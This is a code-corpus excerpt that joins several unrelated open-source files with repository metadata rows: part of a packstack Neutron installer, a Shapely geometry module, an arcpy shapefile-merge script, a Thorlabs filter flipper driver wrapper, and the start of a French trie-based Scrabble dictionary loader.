"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
]
for group in conf_groups:
paramList = conf_params[group["GROUP_NAME"]]
controller.addGroup(group, paramList)
def getInterfaceDriver():
if controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "openvswitch":
return 'neutron.agent.linux.interface.OVSInterfaceDriver'
elif controller.CONF['CONFIG_NEUTRON_L2_PLUGIN'] == 'linuxbridge':
return 'neutron.agent.linux.interface.BridgeInterfaceDriver'
def initSequences(controller):
if controller.CONF['CONFIG_NEUTRON_INSTALL'] != 'y':
return
if controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "openvswitch":
controller.CONF['CONFIG_NEUTRON_L2_DBNAME'] = 'ovs_neutron'
controller.CONF['CONFIG_NEUTRON_CORE_PLUGIN'] = 'neutron.plugins.openvswitch.ovs_neutron_plugin.OVSNeutronPluginV2'
elif controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "linuxbridge":
controller.CONF['CONFIG_NEUTRON_L2_DBNAME'] = 'neutron_linux_bridge'
controller.CONF['CONFIG_NEUTRON_CORE_PLUGIN'] = 'neutron.plugins.linuxbridge.lb_neutron_plugin.LinuxBridgePluginV2'
global api_hosts, l3_hosts, dhcp_hosts, compute_hosts, meta_hosts, q_hosts
dirty = controller.CONF['CONFIG_NEUTRON_SERVER_HOST'].split(',')
api_hosts = set([i.strip() for i in dirty if i.strip()])
dirty = controller.CONF['CONFIG_NEUTRON_L3_HOSTS'].split(',')
l3_hosts = set([i.strip() for i in dirty if i.strip()])
dirty = controller.CONF['CONFIG_NEUTRON_DHCP_HOSTS'].split(',')
dhcp_hosts = set([i.strip() for i in dirty if i.strip()])
dirty = controller.CONF['CONFIG_NEUTRON_METADATA_HOSTS'].split(',')
meta_hosts = set([i.strip() for i in dirty if i.strip()])
dirty = controller.CONF['CONFIG_NOVA_COMPUTE_HOSTS'].split(',')
compute_hosts = set([i.strip() for i in dirty if i.strip()])
q_hosts = api_hosts | l3_hosts | dhcp_hosts | compute_hosts | meta_hosts
neutron_steps = [
{'title': 'Adding Neutron API manifest entries', 'functions':[createManifest]},
{'title': 'Adding Neutron Keystone manifest entries', 'functions':[createKeystoneManifest]},
{'title': 'Adding Neutron L3 manifest entries', 'functions':[createL3Manifests]},
{'title': 'Adding Neutron L2 Agent manifest entries', 'functions':[createL2AgentManifests]},
{'title': 'Adding Neutron DHCP Agent manifest entries', 'functions':[createDHCPManifests]},
{'title': 'Adding Neutron Metadata Agent manifest entries', 'functions':[createMetadataManifests]},
]
controller.addSequence("Installing OpenStack Neutron", [], [], neutron_steps)
def createManifest(config):
global q_hosts
for host in q_hosts:
manifest_file = "%s_neutron.pp" % (host,)
manifest_data = getManifestTemplate("neutron.pp")
appendManifestFile(manifest_file, manifest_data, 'neutron')
if host in api_hosts:
manifest_file = "%s_neutron.pp" % (host,)
manifest_data = getManifestTemplate("neutron_api.pp")
# Firewall Rules
config['FIREWALL_ALLOWED'] = ",".join(["'%s'" % i for i in q_hosts])
config['FIREWALL_SERVICE_NAME'] = "neutron"
config['FIREWALL_PORTS'] = "'9696'"
manifest_data += getManifestTemplate("firewall.pp")
appendManifestFile(manifest_file, manifest_data, 'neutron')
# Set up any l2 plugin configs we need anywhere we install neutron
# XXX I am not completely sure about this, but it seems necessary
if controller.CONF['CONFIG_NEUTRON_L2_PLUGIN'] == 'openvswitch':
nettype = config.get("CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE", "local")
manifest_data = getManifestTemplate("neutron_ovs_plugin_%s.pp" % (nettype,))
appendManifestFile(manifest_file, manifest_data, 'neutron')
elif controller.CONF['CONFIG_NEUTRON_L2_PLUGIN'] == 'linuxbridge':
manifest_data = getManifestTemplate("neutron_lb_plugin.pp")
appendManifestFile(manifest_file, manifest_data, 'neutron')
def createKeystoneManifest(config):
manifestfile = "%s_keystone.pp"%controller.CONF['CONFIG_KEYSTONE_HOST']
manifestdata = getManifestTemplate("keystone_neutron.pp")
appendManifestFile(manifestfile, manifestdata)
def createL3Manifests(config):
global l3_hosts
if controller.CONF['CONFIG_NEUTRON_L3_EXT_BRIDGE'] == 'provider':
controller.CONF['CONFIG_NEUTRON_L3_EXT_BRIDGE'] = ''
for host in l3_hosts:
controller.CONF['CONFIG_NEUTRON_L3_HOST'] = host
controller.CONF['CONFIG_NEUTRON_L3_INTERFACE_DRIVER'] = getInterfaceDriver()
manifestdata = getManifestTemplate("neutron_l3.pp")
manifestfile = "%s_neutron.pp" % (host,)
appendManifestFile(manifestfile, manifestdata + '\n')
if controller.CONF['CONFIG_NEUTRON_L2_PLUGIN'] == 'openvswitch' and controller.CONF['CONFIG_NEUTRON_L3_EXT_BRIDGE']:
controller.CONF['CONFIG_NEUTRON_OVS_BRIDGE'] = controller.CONF['CONFIG_NEUTRON_L3_EXT_BRIDGE']
manifestdata = getManifestTemplate('neutron_ovs_bridge.pp')
appendManifestFile(manifestfile, manifestdata + '\n')
def createDHCPManifests(config):
global dhcp_hosts
for host in dhcp_hosts:
controller.CONF["CONFIG_NEUTRON_DHCP_HOST"] = host
controller.CONF['CONFIG_NEUTRON_DHCP_INTERFACE_DRIVER'] = getInterfaceDriver()
manifestdata = getManifestTemplate("neutron_dhcp.pp")
manifestfile = "%s_neutron.pp" % (host,)
appendManifestFile(manifestfile, manifestdata + "\n")
def get_values(val):
return [x.strip() for x in val.split(',')] if val else []
def createL2AgentManifests(config):
    global api_hosts, compute_hosts, dhcp_hosts, l3_hosts
if controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "openvswitch":
host_var = 'CONFIG_NEUTRON_OVS_HOST'
template_name = "neutron_ovs_agent_%s.pp" % (
config.get('CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE', 'local'),
)
bm_arr = get_values(controller.CONF["CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS"])
iface_arr = get_values(controller.CONF["CONFIG_NEUTRON_OVS_BRIDGE_IFACES"])
# The CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS parameter contains a
# comma-separated list of bridge mappings. Since the puppet module
# expects this parameter to be an array, this parameter must be properly
# formatted by packstack, then consumed by the puppet module.
        # For example, the input string 'A, B, C' should be formatted as
        # "['A', 'B', 'C']" (see the illustrative sketch after this function).
controller.CONF["CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS"] = str(bm_arr)
elif controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "linuxbridge":
host_var = 'CONFIG_NEUTRON_LB_HOST'
template_name = 'neutron_lb_agent.pp'
else:
raise KeyError("Unknown layer2 agent")
# Install l2 agents on every compute host in addition to any hosts listed
# specifically for the l2 agent
for host in api_hosts | compute_hosts | dhcp_hosts | l3_hosts:
controller.CONF[host_var] = host
manifestfile = "%s_neutron.pp" % (host,)
manifestdata = getManifestTemplate(template_name)
appendManifestFile(manifestfile, manifestdata + "\n")
if controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "openvswitch" and \
controller.CONF['CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE'] == 'vlan':
for if_map in iface_arr:
controller.CONF['CONFIG_NEUTRON_OVS_BRIDGE'], controller.CONF['CONFIG_NEUTRON_OVS_IFACE'] = if_map.split(':')
manifestdata = getManifestTemplate("neutron_ovs_port.pp")
appendManifestFile(manifestfile, manifestdata + "\n")
# Additional configurations required for compute hosts
if host in compute_hosts:
manifestdata = getManifestTemplate('neutron_bridge_module.pp')
appendManifestFile(manifestfile, manifestdata + '\n')
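def _example_bridge_mapping_format():
    """Illustrative sketch only (not part of packstack): the reformatting
    described in createL2AgentManifests above. The mapping string below is an
    assumed example; real values come from CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS
    in the answer file."""
    bm_arr = get_values('physnet1:br-eth1, physnet2:br-eth2')
    # bm_arr == ['physnet1:br-eth1', 'physnet2:br-eth2']
    # str(bm_arr) == "['physnet1:br-eth1', 'physnet2:br-eth2']"
    return str(bm_arr)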
def createMetadataManifests(config):
global meta_hosts
for host in meta_hosts:
controller.CONF['CONFIG_NEUTRON_METADATA_HOST'] = host
manifestdata = getManifestTemplate('neutron_metadata.pp')
manifestfile = "%s_neutron.pp" % (host,)
appendManifestFile(manifestfile, manifestdata + "\n")
| apache-2.0 | 2,895,030,083,126,288,400 | 50.338428 | 172 | 0.55952 | false |
jaantollander/CrowdDynamics | crowddynamics/core/geometry.py | 1 | 4119 | """Functions for manipulating Shapely geometry objects
References:
- http://toblerity.org/shapely/manual.html
"""
from collections import Iterable
from functools import reduce
from itertools import chain
from typing import Callable
import numpy as np
import shapely.geometry as geometry
import skimage.draw
from shapely import speedups
from shapely.geometry import Polygon, LineString, Point
from shapely.geometry.base import BaseGeometry, BaseMultipartGeometry
from crowddynamics.core.structures import obstacle_type_linear
if speedups.available:
speedups.enable()
class GeomTypes(object):
POINT = 0.0
LINESTRING = 1.0
POLYGON_HOLE = 2.0
POLYGON_SHELL = 3.0
def _geom_to_array(geom: BaseGeometry):
if isinstance(geom, geometry.Point):
yield np.array([(np.nan, GeomTypes.POINT)])
yield np.asarray(geom.coords)
elif isinstance(geom, geometry.LineString):
yield np.array([(np.nan, GeomTypes.LINESTRING)])
yield np.asarray(geom.coords)
elif isinstance(geom, geometry.Polygon):
for interior in geom.interiors:
yield np.array([(np.nan, GeomTypes.POLYGON_HOLE)])
yield np.asarray(interior)
yield np.array([(np.nan, GeomTypes.POLYGON_SHELL)])
yield np.asarray(geom.exterior)
elif isinstance(geom, BaseMultipartGeometry):
        yield from chain.from_iterable(map(_geom_to_array, geom))
else:
raise TypeError
def geom_to_array(geom: BaseGeometry):
"""Breaking geometry object into continuous array where objects are
separated by array of elements (np.nan, FLAG)
Args:
geom:
Returns:
"""
return np.concatenate(list(_geom_to_array(geom)))
def geom_to_linesegment(geom: BaseGeometry):
"""Converts shapes to point pairs.
>>> ls = LineString([(1, 2), (3, 4)])
>>> list(geom_to_linesegment(ls))
[((1.0, 2.0), (3.0, 4.0))]
>>> poly = Polygon([(5, 6), (7, 8), (9, 10)])
>>> list(geom_to_linesegment(poly))
[((5.0, 6.0), (7.0, 8.0)),
((7.0, 8.0), (9.0, 10.0)),
((9.0, 10.0), (5.0, 6.0))]
>>> list(geom_to_linesegment(ls | poly))
[((1.0, 2.0), (3.0, 4.0)),
((5.0, 6.0), (7.0, 8.0)),
((7.0, 8.0), (9.0, 10.0)),
((9.0, 10.0), (5.0, 6.0))]
Args:
geom (BaseGeometry): BaseGeometry type.
Returns:
Iterable[LineSegment]: Iterable of linesegments
"""
if isinstance(geom, Point):
return iter(())
elif isinstance(geom, LineString):
return zip(geom.coords[:-1], geom.coords[1:])
elif isinstance(geom, Polygon):
return zip(geom.exterior.coords[:-1], geom.exterior.coords[1:])
elif isinstance(geom, BaseMultipartGeometry):
return chain.from_iterable(map(geom_to_linesegment, geom))
else:
raise TypeError('Argument is not subclass of {}'.format(BaseGeometry))
def geom_to_linear_obstacles(geom):
"""Converts shape(s) to array of linear obstacles."""
segments = [] if geom is None else list(geom_to_linesegment(geom))
return np.array(segments, dtype=obstacle_type_linear)
def draw_geom(geom: BaseGeometry,
grid,
indicer: Callable,
value):
"""Draw geom to grid"""
if isinstance(geom, Point):
pass
elif isinstance(geom, LineString):
for line in geom_to_linesegment(geom):
r0, c0, r1, c1 = indicer(line).flatten()
x, y = skimage.draw.line(r0, c0, r1, c1)
grid[y, x] = value
elif isinstance(geom, Polygon):
i = indicer(geom.exterior)
x, y = skimage.draw.polygon(i[:, 0], i[:, 1])
grid[y, x] = value
x, y = skimage.draw.polygon_perimeter(i[:, 0], i[:, 1])
grid[y, x] = value
for j in map(indicer, geom.interiors):
x, y = skimage.draw.polygon(j[:, 0], j[:, 1])
grid[y, x] = 0
elif isinstance(geom, BaseMultipartGeometry):
for geo in geom:
draw_geom(geo, grid, indicer, value)
else:
raise TypeError
def union(*geoms):
"""Union of geometries"""
return reduce(lambda x, y: x | y, geoms)
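if __name__ == '__main__':
    # Minimal usage sketch (illustrative only): combine a wall segment and a
    # room outline, then convert the result to line segments and to the
    # linear-obstacle array used elsewhere in crowddynamics.
    wall = LineString([(0, 0), (0, 5)])
    room = Polygon([(1, 1), (4, 1), (4, 4), (1, 4)])
    combined = union(wall, room)
    print(list(geom_to_linesegment(combined)))
    obstacles = geom_to_linear_obstacles(combined)
    print(len(obstacles))  # number of linear obstacle segments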
| gpl-3.0 | 8,994,286,143,035,750,000 | 29.511111 | 78 | 0.61714 | false |
Riverscapes/pyBRAT | SupportingTools/BatchScripts/01_BatchInputPrep/07_MergePerennialCanals_Batch.py | 1 | 2133 | #----------------------------------------------------------------------------
# Name: Merge Perennial & Canals (Batch)
#
# Purpose: Merges perennial network and canals/ditches shapefile
#
# Date: March 2019
# Author: Maggie Hallerud
#----------------------------------------------------------------------------
# user defined paths
# pf_path - project folder path for batch processing
pf_path = r'C:\Users\ETAL\Desktop\GYE_BRAT\wrk_Data'
# import required modules
import arcpy
import os
arcpy.CheckOutExtension('Spatial')
def main():
# set up arcpy environment
arcpy.env.workspace = 'in_memory'
arcpy.env.overwriteOutput = True
os.chdir(pf_path)
# list all folders in parent folder - note this is not recursive
dir_list = filter(lambda x: os.path.isdir(x), os.listdir('.'))
# remove folders in the list that start with '00_' since these aren't the HUC8 watersheds
for dir in dir_list[:]:
if dir.startswith('00_'):
dir_list.remove(dir)
    # merge perennial and canals/ditches shapefiles and save as 'NHD_24k_Perennial_CanalsDitches.shp'
for dir in dir_list:
# specifying input perennial and canal shapefiles and output shapefile name
perennial_shp = os.path.join(pf_path, dir, 'NHD/NHD_24k_Perennial.shp')
canal_shp = os.path.join(pf_path, dir, 'NHD/NHDCanalsDitches.shp')
out_shp = os.path.join(pf_path, dir, 'NHD/NHD_24k_Perennial_CanalsDitches.shp')
# if canals exist then merge with perennial, otherwise just copy perennial
if os.path.exists(perennial_shp):
print "Merging perennial and canal shapefiles for " + dir
try:
if os.path.exists(canal_shp):
arcpy.Merge_management([perennial_shp, canal_shp], out_shp)
else:
arcpy.CopyFeatures_management(perennial_shp, out_shp)
# catch errors and move to the next huc8 folder
except Exception as err:
print "Error with " + dir + ". Exception thrown was: "
print err
if __name__ == "__main__":
main()
| gpl-3.0 | -4,074,758,029,799,556,000 | 34.55 | 102 | 0.593999 | false |
MSLNZ/msl-equipment | msl/equipment/resources/thorlabs/kinesis/filter_flipper.py | 1 | 16157 | """
This module provides all the functionality required to control a
Filter Flipper (MFF101, MFF102).
"""
from ctypes import byref, c_int64
from msl.equipment.resources import register
from msl.equipment.resources.utils import WORD, DWORD
from msl.equipment.resources.thorlabs.kinesis.motion_control import MotionControl
from msl.equipment.resources.thorlabs.kinesis.api_functions import FilterFlipper_FCNS
from msl.equipment.resources.thorlabs.kinesis.structs import FF_IOSettings
from msl.equipment.resources.thorlabs.kinesis.enums import FF_IOModes, FF_SignalModes
@register(manufacturer=r'Thorlabs', model=r'MFF10[1|2]')
class FilterFlipper(MotionControl):
MIN_TRANSIT_TIME = 300
MAX_TRANSIT_TIME = 2800
MIN_PULSE_WIDTH = 10
MAX_PULSE_WIDTH = 200
def __init__(self, record):
"""A wrapper around ``Thorlabs.MotionControl.FilterFlipper.dll``.
The :attr:`~msl.equipment.record_types.ConnectionRecord.properties`
for a FilterFlipper connection supports the following key-value pairs in the
:ref:`connections-database`::
'device_name': str, the device name found in ThorlabsDefaultSettings.xml [default: None]
Do not instantiate this class directly. Use the :meth:`~.EquipmentRecord.connect`
method to connect to the equipment.
Parameters
----------
record : :class:`~msl.equipment.record_types.EquipmentRecord`
A record from an :ref:`equipment-database`.
"""
name = record.connection.properties.get('device_name')
if name is None:
record.connection.properties['device_name'] = 'MFF Filter Flipper'
super(FilterFlipper, self).__init__(record, FilterFlipper_FCNS)
def open(self):
"""Open the device for communication.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_Open(self._serial)
def close(self):
"""Disconnect and close the device."""
self.sdk.FF_Close(self._serial)
def check_connection(self):
"""Check connection.
Returns
-------
:class:`bool`
Whether the USB is listed by the FTDI controller.
"""
return self.sdk.FF_CheckConnection(self._serial)
def identify(self):
"""Sends a command to the device to make it identify itself."""
self.sdk.FF_Identify(self._serial)
def get_hardware_info(self):
"""Gets the hardware information from the device.
Returns
-------
:class:`.structs.TLI_HardwareInformation`
The hardware information.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
return self._get_hardware_info(self.sdk.FF_GetHardwareInfo)
def get_firmware_version(self):
"""Gets version number of the device firmware.
Returns
-------
:class:`str`
The firmware version.
"""
return self.to_version(self.sdk.FF_GetFirmwareVersion(self._serial))
def get_software_version(self):
"""Gets version number of the device software.
Returns
-------
:class:`str`
The device software version.
"""
return self.to_version(self.sdk.FF_GetSoftwareVersion(self._serial))
def load_settings(self):
"""Update device with stored settings.
The settings are read from ``ThorlabsDefaultSettings.xml``, which
gets created when the Kinesis software is installed.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_LoadSettings(self._serial)
def load_named_settings(self, settings_name):
"""Update device with named settings.
Parameters
----------
settings_name : :class:`str`
            The name of the device to load the settings for. Examples for the value
            of ``settings_name`` can be found in ``ThorlabsDefaultSettings.xml``, which
gets created when the Kinesis software is installed.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_LoadNamedSettings(self._serial, settings_name.encode())
def persist_settings(self):
"""Persist the devices current settings.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_PersistSettings(self._serial)
def get_number_positions(self):
"""Get number of positions available from the device.
Returns
-------
:class:`int`
The number of positions.
"""
return self.sdk.FF_GetNumberPositions(self._serial)
def home(self):
"""Home the device.
Homing the device will set the device to a known state and determine
the home position.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_Home(self._serial)
def move_to_position(self, position):
"""Move the device to the specified position (index).
Parameters
----------
position : :class:`int`
The required position. Must be 1 or 2.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_MoveToPosition(self._serial, position)
def get_position(self):
"""Get the current position.
Returns
-------
:class:`int`
The position, 1 or 2 (can be 0 during a move).
"""
return self.sdk.FF_GetPosition(self._serial)
def get_io_settings(self):
"""Gets the I/O settings from filter flipper.
Returns
-------
:class:`~.structs.FF_IOSettings`
The Filter Flipper I/O settings.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
settings = FF_IOSettings()
self.sdk.FF_GetIOSettings(self._serial, byref(settings))
return settings
def request_io_settings(self):
"""Requests the I/O settings from the filter flipper.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_RequestIOSettings(self._serial)
def set_io_settings(self, transit_time=500,
oper1=FF_IOModes.FF_ToggleOnPositiveEdge, sig1=FF_SignalModes.FF_InputButton, pw1=200,
oper2=FF_IOModes.FF_ToggleOnPositiveEdge, sig2=FF_SignalModes.FF_OutputLevel, pw2=200):
"""
Sets the settings on filter flipper.
Parameters
----------
transit_time : :class:`int`, optional
Time taken to get from one position to other in milliseconds.
oper1 : :class:`~.enums.FF_IOModes`, optional
I/O 1 Operating Mode.
sig1 : :class:`~.enums.FF_SignalModes`, optional
I/O 1 Signal Mode.
pw1 : :class:`int`, optional
Digital I/O 1 pulse width in milliseconds.
oper2 : :class:`~.enums.FF_IOModes`, optional
I/O 2 Operating Mode.
sig2 : :class:`~.enums.FF_SignalModes`, optional
I/O 2 Signal Mode.
pw2 : :class:`int`, optional
Digital I/O 2 pulse width in milliseconds.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
if transit_time > self.MAX_TRANSIT_TIME or transit_time < self.MIN_TRANSIT_TIME:
msg = 'Invalid transit time value of {} ms; {} <= transit_time <= {}'.format(
transit_time, self.MIN_TRANSIT_TIME, self.MAX_TRANSIT_TIME)
self.raise_exception(msg)
if pw1 > self.MAX_PULSE_WIDTH or pw1 < self.MIN_PULSE_WIDTH:
msg = 'Invalid digital I/O 1 pulse width of {} ms; {} <= pw <= {}'.format(
pw1, self.MIN_PULSE_WIDTH, self.MAX_PULSE_WIDTH)
self.raise_exception(msg)
if pw2 > self.MAX_PULSE_WIDTH or pw2 < self.MIN_PULSE_WIDTH:
msg = 'Invalid digital I/O 2 pulse width of {} ms; {} <= pw <= {}'.format(
pw2, self.MIN_PULSE_WIDTH, self.MAX_PULSE_WIDTH)
self.raise_exception(msg)
settings = FF_IOSettings()
settings.transitTime = int(transit_time)
settings.digIO1OperMode = self.convert_to_enum(oper1, FF_IOModes, prefix='FF_')
settings.digIO1SignalMode = self.convert_to_enum(sig1, FF_SignalModes, prefix='FF_')
settings.digIO1PulseWidth = int(pw1)
settings.digIO2OperMode = self.convert_to_enum(oper2, FF_IOModes, prefix='FF_')
settings.digIO2SignalMode = self.convert_to_enum(sig2, FF_SignalModes, prefix='FF_')
settings.digIO2PulseWidth = int(pw2)
self.sdk.FF_SetIOSettings(self._serial, byref(settings))
def get_transit_time(self):
"""Gets the transit time.
Returns
-------
:class:`int`
The transit time in milliseconds.
"""
return self.sdk.FF_GetTransitTime(self._serial)
def set_transit_time(self, transit_time):
"""Sets the transit time.
Parameters
----------
transit_time : :class:`int`
The transit time in milliseconds.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
if transit_time > self.MAX_TRANSIT_TIME or transit_time < self.MIN_TRANSIT_TIME:
msg = 'Invalid transit time value of {} ms; {} <= transit_time <= {}'.format(
transit_time, self.MIN_TRANSIT_TIME, self.MAX_TRANSIT_TIME)
self.raise_exception(msg)
self.sdk.FF_SetTransitTime(self._serial, int(transit_time))
def request_status(self):
"""Request status bits.
        This needs to be called to get the device to send its current status.
This is called automatically if Polling is enabled for the device using
:meth:`.start_polling`.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_RequestStatus(self._serial)
def get_status_bits(self):
"""Get the current status bits.
This returns the latest status bits received from the device. To get
new status bits, use :meth:`.request_status` or use the polling
function, :meth:`.start_polling`
Returns
-------
:class:`int`
The status bits from the device.
"""
return self.sdk.FF_GetStatusBits(self._serial)
def start_polling(self, milliseconds):
"""Starts the internal polling loop.
This function continuously requests position and status messages.
Parameters
----------
milliseconds : :class:`int`
The polling rate, in milliseconds.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_StartPolling(self._serial, int(milliseconds))
def polling_duration(self):
"""Gets the polling loop duration.
Returns
-------
:class:`int`
The time between polls in milliseconds or 0 if polling is not active.
"""
return self.sdk.FF_PollingDuration(self._serial)
def stop_polling(self):
"""Stops the internal polling loop."""
self.sdk.FF_StopPolling(self._serial)
def time_since_last_msg_received(self):
"""Gets the time, in milliseconds, since tha last message was received.
This can be used to determine whether communications with the device is
still good.
Returns
-------
:class:`int`
The time, in milliseconds, since the last message was received.
"""
ms = c_int64()
self.sdk.FF_TimeSinceLastMsgReceived(self._serial, byref(ms))
return ms.value
def enable_last_msg_timer(self, enable, msg_timeout=0):
"""Enables the last message monitoring timer.
This can be used to determine whether communications with the device is
still good.
Parameters
----------
enable : :class:`bool`
:data:`True` to enable monitoring otherwise :data:`False` to disable.
msg_timeout : :class:`int`, optional
The last message error timeout in ms. Set to 0 to disable.
"""
self.sdk.FF_EnableLastMsgTimer(self._serial, enable, msg_timeout)
def has_last_msg_timer_overrun(self):
"""Queries if the time since the last message has exceeded the
``lastMsgTimeout`` set by :meth:`.enable_last_msg_timer`.
This can be used to determine whether communications with the device is
still good.
Returns
-------
:class:`bool`
:data:`True` if last message timer has elapsed or
:data:`False` if monitoring is not enabled or if time of last message
received is less than ``msg_timeout``.
"""
return self.sdk.FF_HasLastMsgTimerOverrun(self._serial)
def request_settings(self):
"""Requests that all settings are downloaded from the device.
        This function requests that the device upload all its settings to the
DLL.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_RequestSettings(self._serial)
def clear_message_queue(self):
"""Clears the device message queue."""
self.sdk.FF_ClearMessageQueue(self._serial)
def register_message_callback(self, callback):
"""Registers a callback on the message queue.
Parameters
----------
callback : :class:`~msl.equipment.resources.thorlabs.kinesis.callbacks.MotionControlCallback`
A function to be called whenever messages are received.
"""
self.sdk.FF_RegisterMessageCallback(self._serial, callback)
def message_queue_size(self):
"""Gets the size of the message queue.
Returns
-------
:class:`int`
The number of messages in the queue.
"""
return self.sdk.FF_MessageQueueSize(self._serial)
def get_next_message(self):
"""Get the next Message Queue item. See :mod:`.messages`.
Returns
-------
:class:`int`
The message type.
:class:`int`
The message ID.
:class:`int`
The message data.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
message_type = WORD()
message_id = WORD()
message_data = DWORD()
self.sdk.FF_GetNextMessage(self._serial, byref(message_type), byref(message_id), byref(message_data))
return message_type.value, message_id.value, message_data.value
def wait_for_message(self):
"""Wait for next Message Queue item. See :mod:`.messages`.
Returns
-------
:class:`int`
The message type.
:class:`int`
The message ID.
:class:`int`
The message data.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
message_type = WORD()
message_id = WORD()
message_data = DWORD()
self.sdk.FF_WaitForMessage(self._serial, byref(message_type), byref(message_id), byref(message_data))
return message_type.value, message_id.value, message_data.value
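def _example_usage(record):
    """Illustrative usage sketch only; not part of the wrapper.
    ``record`` is assumed to be an :class:`~msl.equipment.record_types.EquipmentRecord`
    for an MFF101/MFF102 taken from an :ref:`equipment-database`; its ``connect()``
    method returns an instance of the :class:`FilterFlipper` class defined above.
    """
    flipper = record.connect()
    flipper.start_polling(200)
    flipper.home()
    flipper.move_to_position(2)
    position = flipper.get_position()
    flipper.stop_polling()
    flipper.close()
    return position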
if __name__ == '__main__':
from msl.equipment.resources.thorlabs.kinesis import _print
_print(FilterFlipper, FilterFlipper_FCNS, 'Thorlabs.MotionControl.FilterFlipper.h')
| mit | -1,277,002,313,023,637,200 | 31.574597 | 111 | 0.594355 | false |
Tailszefox/scrabblesolve | binaire.py | 1 | 6312 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os.path
import sys
# Tree node holding a letter
class Noeud(object):
"""
Constructeur
lettre : lettre stockée dans le nœud
mot : True si le chemin représente un mot du dictionnaire, False sinon
fd : lettre située au même niveau et après dans l'ordre alphabétique
fm : lettre située au niveau suivant
"""
def __init__(self, lettre = None, motComplet = None):
self._lettre = None
self._mot = False
self._motComplet = None
self._fd = None
self._fm = None
self.lettre = lettre
self.motComplet = motComplet
    #Getters and setters
def setLettre(self, lettre):
self._lettre = lettre
def getLettre(self):
return self._lettre
def setFd(self, fd):
self._fd = fd
def getFd(self):
return self._fd
def setFm(self, fm):
self._fm = fm
def getFm(self):
return self._fm
def setMot(self, mot):
self._mot = mot
def getMot(self):
return self._mot
def setMotComplet(self, motComplet):
self._motComplet = motComplet
def getMotComplet(self):
return self._motComplet
lettre = property(getLettre, setLettre)
estMot = property(getMot, setMot)
motComplet = property(getMotComplet, setMotComplet)
fd = property(getFd, setFd)
fm = property(getFm, setFm)
#Binary tree
class Arbre(object):
"""
Constructeur
racine : nœud racine de l'arbre
fichier : fichier du dictionnaire
hash : tableau de hashage correspondant aux nœuds
"""
def __init__(self, fichier = None):
self._racine = None
self._fichier = None
self._hash = None
self.charger(fichier)
    #Getters and setters
def getFichier(self):
return self._fichier
def setFichier(self, fichier):
self._fichier = fichier
def getRacine(self):
return self._racine
def setRacine(self, racine):
self._racine = racine
def setHash(self, h):
self._hash = h
def getHash(self):
return self._hash
fichier = property(getFichier, setFichier)
racine = property(getRacine, setRacine)
hash = property(getHash, setHash)
""" Chargement d'un fichier de dictionnaire """
def charger(self, fichier):
if not os.path.exists(fichier):
            sys.exit('The dictionary ' + fichier + ' does not exist.')
self.hash = {}
self.fichier = fichier
self.racine = self.chargerMots()
def chargerMots(self):
racine = None
        #For each word in the dictionary
for mot in open(self.fichier):
            #Strip the trailing \n
mot = mot[:-1]
noeud = None
i = 1
            #Find the longest prefix of the word that already exists in the hash table
motDecoupe = mot[0:-i]
while(motDecoupe and not noeud):
try:
noeud = self.hash[motDecoupe]
except:
                    #The prefix does not exist, remove one letter from the prefix and try again
i += 1
motDecoupe = mot[0:-i]
            #No prefix exists, add the whole word
if(not motDecoupe):
racine = self.inserer(racine, mot, "")
            #A prefix was found, start the insertion from the prefix node, adding the part of the word that does not exist yet
else:
noeud.fm = self.inserer(noeud.fm, mot[-i:], motDecoupe)
return racine
"""
Insertion d'un nœud
noeud : noeud à partir duquel démarrer l'ajout
mot : mot à ajouter (si 'noeud' n'est pas la racine, il ne s'agit pas d'un mot entier)
chemin : chaine représentant le chemin parcouru pour arriver à 'noeud' (vide si noeud est la racine)
"""
def inserer(self, noeud, mot, chemin):
        #The node does not exist, create it and add it to the hash table
if noeud is None:
chemin += mot[0]
noeud = Noeud(mot[0], chemin)
self.hash[chemin] = noeud
        #We are on the node matching the current letter
if (mot[0] == noeud.lettre):
            #The whole word has been added, estMot becomes true
if (len(mot) == 1):
noeud.estMot = True
            #Add the rest of the word
else:
noeud.fm = self.inserer(noeud.fm, mot[1:], chemin)
        #We are not on the node matching the current letter, continue the insertion to the right
else:
noeud.fd = self.inserer(noeud.fd, mot, chemin)
return noeud
""" Recherche d'un mot dans l'arbre """
def rechercher(self, mot, noeuds = None):
estMot = False
suivants = []
        #If no starting node is given, start from the root
if(not noeuds):
noeuds = [self.racine]
        #For each of the nodes from which to run the search
for noeud in noeuds:
estMotActuel, suivant = self.rechercherMot(noeud, mot)
            #If at least one word is found, estMot becomes the current node holding the complete word
